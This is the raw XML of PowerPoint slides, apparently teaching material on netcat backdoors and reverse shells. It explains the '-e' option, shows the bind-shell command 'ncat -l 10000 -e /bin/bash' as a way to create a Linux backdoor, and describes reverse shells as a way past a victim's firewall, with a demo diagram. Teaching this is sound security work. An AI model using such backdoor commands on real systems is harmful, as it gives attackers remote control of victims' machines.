                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>: program to execute after connection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>occures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>., connecting STDIN and STDOUT to the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>: a shell command for Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6502808" y="0"/>
            <a:ext cx="5689192" cy="6394221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5645309" y="1924969"/>
            <a:ext cx="904735" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Left-Right Arrow 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4701377" y="1236193"/>
            <a:ext cx="1684075" cy="21106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
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="324536" y="6017257"/>
            <a:ext cx="4675064" cy="376966"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3636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95220" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t>ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t> -l 10000 -e /bin/bash    //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t>if create a backdoor in Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324537" y="205173"/>
            <a:ext cx="2340641" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Start listener first</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2587511" y="436006"/>
            <a:ext cx="77667" cy="70425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3" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4252411" y="126386"/>
            <a:ext cx="2024732" cy="318100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Start Client second</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5264777" y="444486"/>
            <a:ext cx="1238032" cy="23918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318379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Reverse Shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Subtitle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A new type of backdoor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="6470651"/>
            <a:ext cx="732367" cy="387349"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en" smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2125122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Standard input/output/error</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16338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Motivation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Normal backdoor at victim’s PC needs to be activate by the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Victim can setup a firewall to block the income connecting request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Image result for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4518" y="4023199"/>
            <a:ext cx="5601588" cy="2195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83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bypass firewall?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Firewall doesn’t block signals sent from victims</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Let the victim sends the signal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Let the attacker to listen to the signal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en" smtClean="0"/>
              <a:pPr algn="l"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2" descr="Image result for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5750" y="1"/>
            <a:ext cx="5104285" cy="20006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5750" y="4296307"/>
            <a:ext cx="5104285" cy="2000676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Right Arrow 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7885330" y="4420697"/>
            <a:ext cx="2631367" cy="14911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0000"/>
                </a:solidFill>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8482642" y="4010328"/>
            <a:ext cx="1811009" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Reverse shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="686110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shell definition</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse shell is getting the connection from the victim or target to your computer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en" smtClean="0"/>
              <a:pPr algn="l"/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3430879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Reverse shell demo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Group 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="691306" y="3101419"/>
            <a:ext cx="9244345" cy="2167923"/>
            <a:chOff x="1220568" y="4947656"/>
            <a:chExt cx="16789969" cy="4722849"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="pasted-image.tif"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1220568" y="6319169"/>
              <a:ext cx="2050617" cy="2050617"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Shape 201"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4531579" y="5705086"/>
              <a:ext cx="2122268" cy="1112395"/>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sz="2300"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2133" dirty="0"/>
                <a:t>std input</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Shape 202"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4550624" y="7663171"/>
              <a:ext cx="2164425" cy="1023276"/>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sz="2300"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1867" dirty="0"/>
                <a:t>std output</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Shape 203"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3381619" y="6442023"/>
              <a:ext cx="1083158" cy="438163"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="4267"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Shape 204"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3321689" y="7804900"/>
              <a:ext cx="1079942" cy="355834"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="4267"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="32" name="Picture 31"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579816" y="6023612"/>
              <a:ext cx="5434477" cy="101603"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="33" name="Picture 32"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579818" y="6463892"/>
              <a:ext cx="5434478" cy="101604"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="34" name="Picture 33"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579818" y="7937137"/>
              <a:ext cx="5434478" cy="101604"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="Picture 34"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579818" y="8428218"/>
              <a:ext cx="5434478" cy="101604"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Shape 213"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="12026615" y="6185254"/>
              <a:ext cx="1092679" cy="38024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7" name="Shape 214"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="12117936" y="7804899"/>
              <a:ext cx="838107" cy="523630"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="4267"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Shape 215"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8298014" y="6294553"/>
              <a:ext cx="2390972"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9" name="Shape 216"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8233576" y="8233479"/>
              <a:ext cx="2519848"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40" name="Shape 217"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8901674" y="4947656"/>
              <a:ext cx="1379383" cy="1529499"/>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dirty="0" err="1"/>
                <a:t>tcp</a:t>
              </a:r>
              <a:endParaRPr sz="3377" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="Shape 218"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9012254" y="8141006"/>
              <a:ext cx="1379383" cy="1529499"/>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a:t>tcp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Shape 219"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13351927" y="6095079"/>
              <a:ext cx="3841634" cy="1112395"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
                <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
              </a:ext>
            </a:extLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2133" dirty="0"/>
                <a:t>puts input</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Shape 220"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13246136" y="7266198"/>
              <a:ext cx="4764401" cy="1112395"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
                <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
              </a:ext>
            </a:extLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2133" dirty="0"/>
                <a:t>receive</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2133" dirty="0"/>
                <a:t> output</a:t>
              </a:r>
              <a:endParaRPr sz="2133" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9675751" y="3705465"/>
            <a:ext cx="1357165" cy="870848"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Shape 198"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="774914" y="4722416"/>
            <a:ext cx="851932" cy="674832"/>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b="1">
                <a:solidFill>
                  <a:srgbClr val="00882B"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/ Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Shape 197"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9800404" y="4675773"/>
            <a:ext cx="1097577" cy="674832"/>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b="1">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
